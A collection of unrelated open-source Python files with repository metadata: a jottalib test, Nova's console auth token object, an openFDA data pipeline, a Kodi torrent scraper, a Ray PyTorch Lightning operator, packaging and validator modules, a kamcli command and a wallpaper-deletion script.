assert jottapath == "/TEST_ROOT/subdir/correct_url.txt"
def test_weird_path_is_correct_url(tmpdir):
tmpdir = str(tmpdir)
aeh = ArchiveEventHandler(None, tmpdir, "/TEST_ROOT")
filepath = os.path.join(tmpdir, "subdir1", "..", "subdir2", "correct_url.txt")
jottapath = aeh.get_jottapath(filepath)
assert jottapath == "/TEST_ROOT/subdir2/correct_url.txt"
def test_filename_renamed(tmpdir):
tmpdir = str(tmpdir)
aeh = ArchiveEventHandler(None, tmpdir, "/TEST_ROOT")
filepath = os.path.join(tmpdir, "subdir", "first_url.txt")
jottapath = aeh.get_jottapath(filepath, "correct_url.txt")
assert jottapath == "/TEST_ROOT/subdir/correct_url.txt"
| cowai/jottalib | tests/test_archiveEventHandler.py | Python | gpl-3.0 | 1,018 |
# Copyright 2015 Intel Corp
# Copyright 2016 Hewlett Packard Enterprise Development Company LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from urllib import parse as urlparse
from oslo_db.exception import DBDuplicateEntry
from oslo_log import log as logging
from oslo_utils import strutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
from nova.db import api as db
from nova import exception
from nova.i18n import _
from nova.objects import base
from nova.objects import fields
from nova import utils
LOG = logging.getLogger(__name__)
@base.NovaObjectRegistry.register
class ConsoleAuthToken(base.NovaTimestampObject, base.NovaObject):
# Version 1.0: Initial version
# Version 1.1: Add clean_expired_console_auths method.
# The clean_expired_console_auths_for_host method
# was deprecated.
VERSION = '1.1'
fields = {
'id': fields.IntegerField(),
'console_type': fields.StringField(nullable=False),
'host': fields.StringField(nullable=False),
'port': fields.IntegerField(nullable=False),
'internal_access_path': fields.StringField(nullable=True),
'instance_uuid': fields.UUIDField(nullable=False),
'access_url_base': fields.StringField(nullable=True),
# NOTE(PaulMurray): The unhashed token field is not stored in the
# database. A hash of the token is stored instead and is not a
# field on the object.
'token': fields.StringField(nullable=False),
}
@property
def access_url(self):
"""The access url with token parameter.
:returns: the access url with credential parameters
access_url_base is the base url used to access a console.
Adding the unhashed token as a parameter in a query string makes it
specific to this authorization.
"""
if self.obj_attr_is_set('id'):
if self.console_type == 'novnc':
# NOTE(melwitt): As of noVNC v1.1.0, we must use the 'path'
# query parameter to pass the auth token within, as the
# top-level 'token' query parameter was removed. The 'path'
# parameter is supported in older noVNC versions, so it is
# backward compatible.
qparams = {'path': '?token=%s' % self.token}
return '%s?%s' % (self.access_url_base,
urlparse.urlencode(qparams))
else:
return '%s?token=%s' % (self.access_url_base, self.token)
@staticmethod
def _from_db_object(context, obj, db_obj):
# NOTE(PaulMurray): token is not stored in the database but
# this function assumes it is in db_obj. The unhashed token
# field is populated in the authorize method after the token
# authorization is created in the database.
for field in obj.fields:
setattr(obj, field, db_obj[field])
obj._context = context
obj.obj_reset_changes()
return obj
@base.remotable
def authorize(self, ttl):
"""Authorise the console token and store in the database.
:param ttl: time to live in seconds
:returns: an authorized token
The expires value is set for ttl seconds in the future and the token
hash is stored in the database. This function can only succeed if the
token is unique and the object has not already been stored.
"""
if self.obj_attr_is_set('id'):
raise exception.ObjectActionError(
action='authorize',
reason=_('must be a new object to authorize'))
token = uuidutils.generate_uuid()
token_hash = utils.get_sha256_str(token)
expires = timeutils.utcnow_ts() + ttl
updates = self.obj_get_changes()
# NOTE(melwitt): token could be in the updates if authorize() has been
# called twice on the same object. 'token' is not a database column and
# should not be included in the call to create the database record.
if 'token' in updates:
del updates['token']
updates['token_hash'] = token_hash
updates['expires'] = expires
try:
db_obj = db.console_auth_token_create(self._context, updates)
db_obj['token'] = token
self._from_db_object(self._context, self, db_obj)
except DBDuplicateEntry:
# NOTE(PaulMurray) we are generating the token above so this
# should almost never happen - but technically its possible
raise exception.TokenInUse()
LOG.debug("Authorized token with expiry %(expires)s for console "
"connection %(console)s",
{'expires': expires,
'console': strutils.mask_password(self)})
return token
@base.remotable_classmethod
def validate(cls, context, token):
"""Validate the token.
:param context: the context
:param token: the token for the authorization
:returns: The ConsoleAuthToken object if valid
The token is valid if the token is in the database and the expires
time has not passed.
"""
token_hash = utils.get_sha256_str(token)
db_obj = db.console_auth_token_get_valid(context, token_hash)
if db_obj is not None:
db_obj['token'] = token
obj = cls._from_db_object(context, cls(), db_obj)
LOG.debug("Validated token - console connection is "
"%(console)s",
{'console': strutils.mask_password(obj)})
return obj
else:
LOG.debug("Token validation failed")
raise exception.InvalidToken(token='***')
@base.remotable_classmethod
def clean_console_auths_for_instance(cls, context, instance_uuid):
"""Remove all console authorizations for the instance.
:param context: the context
:param instance_uuid: the instance to be cleaned
All authorizations related to the specified instance will be
removed from the database.
"""
db.console_auth_token_destroy_all_by_instance(context, instance_uuid)
@base.remotable_classmethod
def clean_expired_console_auths(cls, context):
"""Remove all expired console authorizations.
:param context: the context
All expired authorizations will be removed.
Tokens that have not expired will remain.
"""
db.console_auth_token_destroy_expired(context)
# TODO(takashin): This method was deprecated and will be removed
# in a next major version bump.
@base.remotable_classmethod
def clean_expired_console_auths_for_host(cls, context, host):
"""Remove all expired console authorizations for the host.
:param context: the context
:param host: the host name
All expired authorizations related to the specified host
will be removed. Tokens that have not expired will
remain.
"""
db.console_auth_token_destroy_expired_by_host(context, host)
| klmitch/nova | nova/objects/console_auth_token.py | Python | apache-2.0 | 7,694 |
from rest_framework import serializers
from file_manager.models import FileManager
class FileManagerSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = FileManager
fields = ('id', 'url', 'name', 'file')
| craigbruce/drf_sandbox | file_manager/serializer.py | Python | bsd-3-clause | 246 |
#!/usr/bin/python
''' 510k pipeline for downloading, transforming to JSON and loading into
Elasticsearch.
'''
import collections
import glob
import logging
import os
from os.path import basename, dirname, join
import sys
import arrow
import elasticsearch
import luigi
import requests
import simplejson as json
from openfda import common, config, elasticsearch_requests, index_util, parallel
from openfda import download_util
from openfda.device_clearance import transform
from openfda.device_harmonization.pipeline import (Harmonized2OpenFDA,
DeviceAnnotateMapper)
from openfda.index_util import AlwaysRunTask, ResetElasticSearch
RUN_DIR = dirname(dirname(os.path.abspath(__file__)))
BASE_DIR = './data/'
# A directory for holding files that track Task state
META_DIR = join(BASE_DIR, '510k/meta')
common.shell_cmd('mkdir -p %s', META_DIR)
CLEARED_DEVICE_URL = 'http://www.accessdata.fda.gov/premarket/ftparea/'
CLEARED_DEV_ZIPS = [CLEARED_DEVICE_URL + 'pmn96cur.zip',
CLEARED_DEVICE_URL + 'pmn9195.zip',
CLEARED_DEVICE_URL + 'pmn8690.zip',
CLEARED_DEVICE_URL + 'pmn8185.zip',
CLEARED_DEVICE_URL + 'pmn7680.zip']
class Download_510K(luigi.Task):
def requires(self):
return []
def output(self):
return luigi.LocalTarget(join(BASE_DIR, '510k/raw'))
def run(self):
output_dir = self.output().path
for zip_url in CLEARED_DEV_ZIPS:
output_filename = join(output_dir, zip_url.split('/')[-1])
common.download(zip_url, output_filename)
class ExtractAndCleanDownloads510k(luigi.Task):
''' Unzip each of the download files and remove all the non-UTF8 characters.
Unzip -p streams the data directly to iconv which then writes to disk.
'''
def requires(self):
return Download_510K()
def output(self):
return luigi.LocalTarget(join(BASE_DIR, '510k/extracted'))
def run(self):
output_dir = self.output().path
common.shell_cmd('mkdir -p %s', output_dir)
input_dir = self.input().path
download_util.extract_and_clean(input_dir, 'ISO-8859-1', 'UTF-8', 'txt')
class Clearance2JSON(parallel.MRTask):
def map(self, key, value, output):
# TODO(hansnelsen): bring the `transform.py` logic into the mapper and
# remove the file.
new_value = transform.transform_device_clearance(value)
output.add(self.filename + ':' + key, new_value)
def requires(self):
return ExtractAndCleanDownloads510k()
def output_format(self):
return parallel.JSONLineOutput()
def output(self):
return luigi.LocalTarget(join(BASE_DIR, '510k', 'json.db'))
def mapreduce_inputs(self):
input_files = glob.glob(self.input().path + '/*.txt')
return parallel.Collection.from_glob(
input_files, parallel.CSVDictLineInput(delimiter='|', strip_str='\0'))
class ClearanceAnnotateMapper(DeviceAnnotateMapper):
def filter(self, data):
product_code = data['product_code']
harmonized = self.harmonized_db.get(product_code, None)
if harmonized:
# 510k should never have a PMA openfda key
if 'device_pma' in harmonized:
del harmonized['device_pma']
if self.table in harmonized:
del harmonized[self.table]
return harmonized
return None
class AnnotateDevice(luigi.Task):
def requires(self):
return [Harmonized2OpenFDA(), Clearance2JSON()]
def output(self):
return luigi.LocalTarget(join(BASE_DIR, '510k','annotate.db'))
def run(self):
harmonized_db = parallel.ShardedDB.open(self.input()[0].path).as_dict()
parallel.mapreduce(
parallel.Collection.from_sharded(self.input()[1].path),
mapper=ClearanceAnnotateMapper(harmonized_db=harmonized_db),
reducer=parallel.IdentityReducer(),
output_prefix=self.output().path,
num_shards=10)
class LoadJSON(index_util.LoadJSONBase):
index_name = 'deviceclearance'
type_name = 'device510k'
mapping_file = './schemas/clearance_mapping.json'
data_source = AnnotateDevice()
use_checksum = False
if __name__ == '__main__':
luigi.run()
| HiTechIronMan/openfda | openfda/device_clearance/pipeline.py | Python | cc0-1.0 | 4,009 |
from kmediatorrent import plugin
from kmediatorrent.scrapers import scraper
from kmediatorrent.ga import tracked
from kmediatorrent.caching import cached_route
from kmediatorrent.utils import ensure_fanart
# Temporary, will be fixed later by them
BASE_URL = "%s/" % plugin.get_setting("base_nyaa")
HEADERS = {
"Referer": BASE_URL,
}
CATEGORIES = [
("Anime", "1_0", (
("English-translated Anime", "1_37"),
("Raw Anime", "1_11"),
("Non-English-translated Anime", "1_38"),
("Anime Music Video", "1_32"),
)),
("Live Action (movies)", "5_0", (
("English-translated Live Action", "5_19"),
("Raw Live Action", "5_20"),
("Non-English-translated Live Action", "5_21"),
("Live Action Promotional Video", "5_22"),
)),
]
SORT_DATE = 1
SORT_SEEDERS = 2
SORT_LEECHERS = 3
SORT_DOWNLOADS = 4
SORT_SIZE = 5
SORT_NAME = 6
SORT_DESCENDING = 1
SORT_ASCENDING = 2
# Cache TTLs
DEFAULT_TTL = 2 * 3600 # 2 hours
@scraper("%s"%plugin.get_setting("nyaa_label"), "%s"%plugin.get_setting("nyaa_picture"))
@plugin.route("/nyaa")
@tracked
def nyaa_index():
yield {"label": "Search", "path": plugin.url_for("nyaa_search")}
def make_cats(root, prefix=""):
for cat in root:
yield {
"label": "%s%s" % (prefix, cat[0]),
"path": plugin.url_for("default_nyaa_page", cats=cat[1], offset=0, sort=SORT_SEEDERS, order=SORT_DESCENDING),
}
if len(cat) > 2:
for entry in make_cats(cat[2], prefix="%s " % prefix):
yield entry
for cat in make_cats(CATEGORIES):
yield cat
@plugin.route("/nyaa/show/<cats>/<offset>/<sort>/<order>")
@tracked
def default_nyaa_page(cats, offset, sort, order):
return nyaa_page(cats, offset, sort, order)
@plugin.route("/nyaa/search/<term>/<offset>/<sort>/<order>")
@tracked
def search_result_page(term, offset, sort, order):
return nyaa_page("1_0", offset, sort, order, term)
def nyaa_page(cats, offset, sort, order, term=""):
from kmediatorrent.scrapers import rss
from kmediatorrent.utils import url_get
offset = int(offset)
rss_data = url_get(BASE_URL, headers=HEADERS, params={
"cats": cats,
"offset": "%d" % offset,
"sort": sort,
"order": order,
"term": term,
"page": "rss",
})
for item in rss.parse(rss_data):
yield item
yield {
"label": ">> Next page",
"path": plugin.url_for(term and "search_result_page" or "default_nyaa_page", cats=cats, sort=sort, order=order, term=term, offset=offset + 1),
"is_playable": False,
}
@plugin.route("/nyaa/search")
@tracked
def nyaa_search():
query = plugin.request.args.get("query")
if query:
query = query[0]
else:
query = plugin.keyboard("", "kmediatorrent - NyaaTorrents - Search")
if query:
plugin.redirect(plugin.url_for("search_result_page", page="search", cats="0_0", filter=0, term=query, offset=1, sort=SORT_DATE, order=SORT_DESCENDING))
| jmarth/plugin.video.kmediatorrent | resources/site-packages/kmediatorrent/scrapers/nyaa.py | Python | gpl-3.0 | 3,074 |
import inspect
import logging
import torch
from pytorch_lightning.core.step_result import Result
from pytorch_lightning.overrides.data_parallel import LightningDistributedDataParallel
from pytorch_lightning.utilities.model_utils import is_overridden
from pytorch_lightning.trainer.model_hooks import TrainerModelHooksMixin
from pytorch_lightning.trainer.optimizers import TrainerOptimizersMixin
import pytorch_lightning as ptl
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.memory import recursive_detach
from ray.util.annotations import Deprecated
from ray.util.sgd.torch import TrainingOperator
from ray.util.sgd.torch.constants import (
NUM_STEPS,
SCHEDULER_STEP_BATCH,
SCHEDULER_STEP_EPOCH,
)
from ray.util.sgd.utils import AverageMeterCollection, NUM_SAMPLES
tqdm = None
try:
from tqdm import tqdm
except ImportError:
pass
logger = logging.getLogger(__name__)
@Deprecated
class LightningOperator(
TrainingOperator, TrainerModelHooksMixin, TrainerOptimizersMixin
):
"""A subclass of TrainingOperator created from a PTL ``LightningModule``.
This class is returned by `TrainingOperator.from_ptl` and it's training
state is defined by the Pytorch Lightning ``LightningModule`` that is
passed into `from_ptl`. Training and validation functionality have
already been implemented according to
Pytorch Lightning's Trainer. But if you need to modify training,
you should subclass this class and override the appropriate methods
before passing in the subclass to `TorchTrainer`.
.. code-block:: python
MyLightningOperator = TrainingOperator.from_ptl(
MyLightningModule)
trainer = TorchTrainer(training_operator_cls=MyLightningOperator,
...)
"""
def _configure_apex_amp(self, amp, models, optimizers, apex_args=None):
assert len(models) == 1
model = models[0]
assert isinstance(model, ptl.LightningModule)
model, optimizers = model.configure_apex(amp, model, optimizers, amp_level="O2")
return [model], optimizers
def _configure_ddp(self, models, device_ids, ddp_args=None):
assert len(models) == 1
model = models[0]
assert isinstance(model, ptl.LightningModule)
model = LightningDistributedDataParallel(
model, device_ids=device_ids, find_unused_parameters=True
)
return [model]
@property
def model(self):
"""The LightningModule to use for training.
The returned model is wrapped in DDP if using distributed training.
"""
return self._model
@property
def scheduler_dicts(self):
"""Returns list of scheduler dictionaries.
List is empty if no schedulers are returned in the
configure_optimizers method of your LightningModule.
Default configuration is used if configure_optimizers
returns scheduler objects.
See
https://pytorch-lightning.readthedocs.io/en/latest/lightning_module.html#configure-optimizers
"""
return self._scheduler_dicts
@property
def optimizers(self):
"""Returns list of optimizers as returned by configure_optimizers."""
return self._optimizers
@property
def schedulers(self):
"""Returns list of schedulers as returned by configure_optimizers.
List is empty if no schedulers are returned in configure_optimizers.
"""
return self._schedulers
def get_model(self):
"""Returns original LightningModule, not wrapped in DDP."""
if isinstance(self.model, LightningDistributedDataParallel):
return self.model.module
else:
return self.model
def setup(self, config):
# Pass in config if ptl_module accepts it.
ptl_class = self.__class__._lightning_module_cls
if not issubclass(ptl_class, ptl.LightningModule):
raise TypeError(
"Argument must be subclass of "
"pytorch_lightning.LightningModule. Got class {} "
"instead.".format(ptl_class)
)
if "config" in inspect.signature(ptl_class.__init__).parameters:
ptl_module = ptl_class(config=config)
else:
ptl_module = ptl_class()
# This is needed for LightningDistributedDataParallel.
ptl_module.testing = False
# Call on_fit_start on instantiation.
if self.is_function_implemented("on_fit_start", ptl_module):
ptl_module.on_fit_start()
# Only run data preparation once per node.
if self.local_rank == 0 and self.is_function_implemented(
"prepare_data", ptl_module
):
ptl_module.prepare_data()
# Call model.setup.
ptl_module.setup("fit")
if not is_overridden("configure_optimizers", ptl_module):
raise MisconfigurationException(
"No `configure_optimizers()` method defined."
)
optimizers, self._scheduler_dicts, optimizer_frequencies = self.init_optimizers(
model=ptl_module
)
if len(optimizer_frequencies) > 0:
logger.warning(
"Optimizer frequencies will be ignored. When "
"passing in multiple optimizers, you should "
"implement your own custom training loop."
)
lr_schedulers = []
for scheduler in self.scheduler_dicts:
if isinstance(scheduler, dict):
# A scheduler dictionary is passed in.
if (
"reduce_on_plateau" in scheduler
and "monitor" in scheduler
and scheduler["reduce_on_plateau"] is True
):
logger.info(
"reduce_on_plateau and monitor will be "
"ignored "
"from the scheduler dict {}. To update a "
"ReduceLROnPlateau scheduler, you should use "
"TorchTrainer.update_schedulers.".format(scheduler)
)
if "frequency" in scheduler and scheduler["frequency"] > 1:
logger.info(
"frequency will be ignored from the "
"scheduler dict {}.".format(scheduler)
)
lr_schedulers.append(scheduler["scheduler"])
else:
lr_schedulers.append(scheduler)
# Set this so register doesn't complain.
self._scheduler_step_freq = "ptl"
ddp_model, self._optimizers, self._schedulers = self.register(
models=[ptl_module], optimizers=optimizers, schedulers=lr_schedulers
)
assert len(ddp_model) == 1
self._model = ddp_model[0]
model = self.get_model()
if self.is_function_implemented("on_pretrain_routine_start", model):
model.on_pretrain_routine_start()
train_data_loader = None
if self.__class__._train_dataloader:
train_data_loader = self.__class__._train_dataloader
elif self.is_function_implemented("train_dataloader", model):
train_data_loader = model.train_dataloader()
val_data_loader = None
if self.__class__._val_dataloader:
val_data_loader = self.__class__._val_dataloader
elif self.is_function_implemented("val_dataloader", model):
val_data_loader = model.val_dataloader()
self.register_data(
train_loader=train_data_loader, validation_loader=val_data_loader
)
def train_epoch(self, iterator, info):
model = self.get_model()
# Enable train mode.
self.model.train()
# Enable gradients.
torch.set_grad_enabled(True)
if self.is_function_implemented("on_train_epoch_start", model):
model.on_train_epoch_start()
if self.use_tqdm and self.world_rank == 0:
desc = ""
if info is not None and "epoch_idx" in info:
if "num_epochs" in info:
desc = f"{info['epoch_idx'] + 1}/{info['num_epochs']}e"
else:
desc = f"{info['epoch_idx'] + 1}e"
# TODO: Implement len for Dataset?
total = info[NUM_STEPS]
if total is None:
if hasattr(iterator, "__len__"):
total = len(iterator)
_progress_bar = tqdm(total=total, desc=desc, unit="batch", leave=False)
# Output for each batch.
epoch_outputs = []
for batch_idx, batch in enumerate(iterator):
batch_info = {"batch_idx": batch_idx, "global_step": self.global_step}
batch_info.update(info)
batch_output = self.train_batch(batch, batch_info=batch_info)
# batch output for each optimizer.
epoch_outputs.append(batch_output)
should_stop = batch_output["signal"] == -1
if self.use_tqdm and self.world_rank == 0:
_progress_bar.n = batch_idx + 1
postfix = {}
if "training_loss" in batch_output:
postfix.update(loss=batch_output["training_loss"])
_progress_bar.set_postfix(postfix)
for s_dict, scheduler in zip(self.scheduler_dicts, self.schedulers):
if s_dict["interval"] == SCHEDULER_STEP_BATCH:
scheduler.step()
self.global_step += 1
if should_stop:
break
processed_outputs = None
if is_overridden("training_epoch_end", model):
raw_outputs = [eo["raw_output"] for eo in epoch_outputs]
processed_outputs = model.training_epoch_end(raw_outputs)
if processed_outputs is not None:
if isinstance(processed_outputs, torch.Tensor):
return_output = {"train_loss": processed_outputs}
elif isinstance(processed_outputs, Result):
raise ValueError(
"Result objects are not supported. Please "
"return a dictionary instead."
)
elif isinstance(processed_outputs, dict):
return_output = processed_outputs
else:
raise TypeError(
"training_epoch_end returned an invalid "
"type. It must return a Tensor, Result, "
"or dict."
)
else:
# User did not override training_epoch_end
assert isinstance(epoch_outputs, list)
# Use AverageMeterCollection util to reduce results.
meter_collection = AverageMeterCollection()
for o in epoch_outputs:
num_samples = o.pop(NUM_SAMPLES, 1)
raw_output = o["raw_output"]
if isinstance(raw_output, dict):
meter_collection.update(raw_output, num_samples)
elif isinstance(raw_output, torch.Tensor):
meter_collection.update(
{"train_loss": o["training_loss"]}, num_samples
)
return_output = meter_collection.summary()
if self.is_function_implemented("on_train_epoch_end", model):
model.on_train_epoch_end([eo.get("raw_output") for eo in epoch_outputs])
for s_dict, scheduler in zip(self.scheduler_dicts, self.schedulers):
if s_dict["interval"] == SCHEDULER_STEP_EPOCH:
scheduler.step()
return return_output
def train_batch(self, batch, batch_info):
# Get the original PTL module.
model = self.get_model()
optimizer = self.optimizers[0]
batch_idx = batch_info["batch_idx"]
epoch_idx = batch_info["epoch_idx"]
if self.is_function_implemented("on_train_batch_start", model):
response = model.on_train_batch_start(
batch=batch, batch_idx=batch_idx, dataloader_idx=0
)
# Skip remainder of epoch if response is -1.
if response == -1:
return {"signal": -1}
args = [batch, batch_idx]
if len(self.optimizers) > 1:
if self.has_arg("training_step", "optimizer_idx"):
args.append(0)
with self.timers.record("fwd"):
if self._is_distributed:
# Use the DDP wrapped model (self.model).
output = self.model(*args)
elif self.use_gpu:
# Using single GPU.
# Don't copy the batch since there is a single gpu that
# the batch could be referenced from and if there are
# multiple optimizers the batch will wind up copying it to
# the same device repeatedly.
device = self.device
batch = model.transfer_batch_to_device(batch, device=device)
args[0] = batch
output = model.training_step(*args)
else:
# Using CPU.
output = model.training_step(*args)
if isinstance(output, Result):
raise ValueError(
"TrainResult objects are not supported. Please "
"return a dictionary instead."
)
# allow any mode to define training_step_end
# do something will all the dp outputs (like softmax)
if is_overridden("training_step_end", model):
output = model.training_step_end(output)
# Extract loss from output if dictionary.
try:
loss = output["loss"]
except Exception:
if isinstance(output, torch.Tensor):
loss = output
else:
raise RuntimeError(
"No `loss` value in the dictionary returned from "
"`model.training_step()`."
)
# If output contains tensors, detach them all.
if isinstance(output, torch.Tensor):
output = output.detach()
elif isinstance(output, dict):
output = recursive_detach(output)
else:
raise TypeError(
"training_step returned invalid type. It must "
"return either a Tensor, Result, or dict."
)
untouched_loss = loss.detach().clone()
with self.timers.record("grad"):
if self.use_fp16_apex:
with self._amp.scale_loss(loss, optimizer) as scaled_loss:
model.backward(scaled_loss, optimizer, optimizer_idx=0)
else:
model.backward(loss, optimizer, optimizer_idx=0)
if self.is_function_implemented("on_after_backward", model):
model.on_after_backward()
with self.timers.record("apply"):
optimizer.step()
model.on_before_zero_grad(optimizer)
model.optimizer_zero_grad(
epoch=epoch_idx, batch_idx=batch_idx, optimizer=optimizer, optimizer_idx=0
)
if self.is_function_implemented("on_train_batch_end", model):
model.on_train_batch_end(
outputs=output, batch=batch, batch_idx=batch_idx, dataloader_idx=0
)
return {
"signal": 0,
"training_loss": untouched_loss.item(),
"raw_output": output,
# NUM_SAMPLES: len(batch)
}
def validate(self, val_iterator, info):
self.model.zero_grad()
self.model.eval()
torch.set_grad_enabled(False)
model = self.get_model()
if self.is_function_implemented("on_validation_epoch_start", model):
model.on_validation_epoch_start()
val_outputs = []
for batch_idx, batch in enumerate(val_iterator):
batch_info = {"batch_idx": batch_idx}
batch_info.update(info)
batch_output = self.validate_batch(batch, batch_info)
if batch_output is not None:
val_outputs.append(batch_output)
processed_outputs = None
if is_overridden("validation_epoch_end", model):
raw_outputs = [vo["raw_output"] for vo in val_outputs]
processed_outputs = model.training_epoch_end(raw_outputs)
if processed_outputs is not None:
if isinstance(processed_outputs, torch.Tensor):
return_output = {"val_loss": processed_outputs}
elif isinstance(processed_outputs, Result):
raise ValueError(
"Result objects are not supported. Please "
"return a dictionary instead."
)
elif isinstance(processed_outputs, dict):
return_output = processed_outputs
else:
raise TypeError(
"validation_epoch_end returned an invalid "
"type. It must return a Tensor, Result, "
"or dict."
)
else:
# User did not override training_epoch_end
assert isinstance(val_outputs, list)
# Use AverageMeterCollection util to reduce results.
meter_collection = AverageMeterCollection()
for v in val_outputs:
num_samples = v.pop(NUM_SAMPLES, 1)
raw_output = v["raw_output"]
if isinstance(raw_output, dict):
meter_collection.update(raw_output, num_samples)
elif isinstance(raw_output, torch.Tensor):
meter_collection.update(
{"val_loss": raw_output.item()}, num_samples
)
return_output = meter_collection.summary()
if self.is_function_implemented("on_validation_epoch_end", model):
model.on_validation_epoch_end()
# Set back to True so training will work.
torch.set_grad_enabled(True)
return return_output
def validate_batch(self, batch, batch_info):
model = self.get_model()
batch_idx = batch_info["batch_idx"]
if is_overridden("on_validation_batch_start", model):
model.on_validation_batch_start(
batch=batch, batch_idx=batch_idx, dataloader_idx=0
)
args = [batch, batch_idx]
with self.timers.record("eval_fwd"):
if self._is_distributed:
# Use the DDP wrapped model (self.model).
output = self.model(*args)
elif self.use_gpu:
# Using single GPU.
device = self.device
batch = model.transfer_batch_to_device(batch, device=device)
args[0] = batch
output = model.validation_step(*args)
else:
# Using CPU.
output = model.validation_step(*args)
if isinstance(output, Result):
raise ValueError(
"EvalResult objects are not supported. Please "
"return a dictionary instead."
)
if is_overridden("on_validation_step_end", model):
output = model.validation_step_end(output)
if self.is_function_implemented("on_validation_batch_end", model):
model.on_validation_batch_end(
outputs=output, batch=batch, batch_idx=batch_idx, dataloader_idx=0
)
return {
"raw_output": output,
# NUM_SAMPLES: len(batch)
}
def state_dict(self):
state_dict = {}
self.get_model().on_save_checkpoint(checkpoint=state_dict)
return state_dict
def load_state_dict(self, state_dict):
self.get_model().on_load_checkpoint(checkpoint=state_dict)
def _get_train_loader(self):
if not hasattr(self, "_train_loader") or self._train_loader is None:
raise RuntimeError(
"Training Operator does not have any "
"registered training loader. Make sure "
"to pass in a training loader to "
"TrainingOperator.from_ptl or implement "
"train_dataloader in your LightningModule."
)
return self._train_loader
def _get_validation_loader(self):
if not hasattr(self, "_validation_loader") or self._validation_loader is None:
raise RuntimeError(
"Training Operator does not have any "
"registered validation loader. Make sure "
"to pass in a validation loader to "
"TrainingOperator.from_ptl or implement "
"val_dataloader in your LightningModule."
)
return self._validation_loader
| ray-project/ray | python/ray/util/sgd/torch/lightning_operator.py | Python | apache-2.0 | 20,906 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
requirements = [
'Click>=6.0',
# TODO: put package requirements here
]
test_requirements = [
# TODO: put package test requirements here
]
setup(
name='trace',
version='0.1.0',
description="Map your brain with Deep Learning",
long_description=readme + '\n\n' + history,
author="Ignacio Tartavull",
author_email='[email protected]',
url='https://github.com/tartavull/trace',
packages=['trace'],
package_dir={'trace':
'trace'},
entry_points={
'console_scripts': [
'trace=trace.cli:main'
]
},
include_package_data=True,
package_data = {
# If any package contains *.txt or *.rst files, include them:
'': ['*.txt', '*.xml', '*.html', '*.js']
},
install_requires=requirements,
license="MIT license",
zip_safe=False,
keywords='trace',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
test_suite='tests',
tests_require=test_requirements
)
| tartavull/trace | setup.py | Python | mit | 1,724 |
import _plotly_utils.basevalidators
class XpadValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="xpad", parent_name="scatter.marker.colorbar", **kwargs
):
super(XpadValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
min=kwargs.pop("min", 0),
**kwargs
)
| plotly/plotly.py | packages/python/plotly/plotly/validators/scatter/marker/colorbar/_xpad.py | Python | mit | 460 |
import click
import json
from kamcli.cli import pass_context
from kamcli.iorpc import command_ctl
@click.command("ps", short_help="Print the list of kamailio processes")
@pass_context
def cli(ctx):
"""Show details about running kamailio processes
\b
"""
command_ctl(ctx, "core.psx", [], {"func": cmd_ps_result_print})
# callback to print the result of the rpc command
def cmd_ps_result_print(ctx, response, params=None):
ctx.vlog("formatting the response for command ps")
rdata = json.loads(response.decode())
if "result" in rdata:
for r in rdata["result"]:
ctx.printf("%4d %5d %s", r["IDX"], r["PID"], r["DSC"])
else:
print(json.dumps(rdata, indent=4, separators=(",", ": ")))
| asipto/kamcli | kamcli/commands/cmd_ps.py | Python | gpl-2.0 | 743 |
#!/usr/bin/python
# Delete Wallpaper. By Anjan Momi.
# {simple python script to show and/or delete current wallpaper}
# Copyright (C) {2014} {Anjandev Momi}
# Contact me at [email protected]
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import os
import sys
import subprocess
def main():
playlist = "~/.fehbg"
playlist = os.path.expanduser(playlist)
with open(playlist) as fin:
feh = fin.readlines()
feh = [elem.strip().split('\'') for elem in feh]
wallpapers = []
for lists in feh:
for walls in lists:
wallpapers.append(walls)
wallpapers.pop(0)
wallpapers.pop(0)
#pop out spaces in list
while(' ' in wallpapers):
wallpapers.remove(' ')
screen = int(input("On what screen is the wallpaper you wish to remove? "))
if screen == 0:
print("I think you mean screen 1")
elif screen == 1 :
p = subprocess.Popen(["/bin/feh", wallpapers[0]])
returncode = p.wait()
ask_and_delete(wallpapers[0])
else:
# move user entered number one over since zero indexed
screen = screen - 1
p = subprocess.Popen(["/bin/feh", wallpapers[screen]])
returncode = p.wait()
ask_and_delete(wallpapers[screen])
def ask_and_delete(wall):
delete = input("was that the wallpaper you wanted to delete? [yes/no] ")
if delete == "yes":
os.remove(wall)
elif delete == "no":
wrongscreen = input("Wrong screen? Yes to select again. No to quit. [yes/no] ")
if wrongscreen == "yes":
main()
elif wrongscreen == "no":
sys.exit(0)
else:
print("Please choose yes or no ")
else:
print("Please choose yes or no ")
if __name__=="__main__":
main()
| anjandev/deletewallpaper | wall.py | Python | gpl-3.0 | 2,496 |
import unittest
class Test_motion(unittest.TestCase):
pass
if __name__ == "__main__":
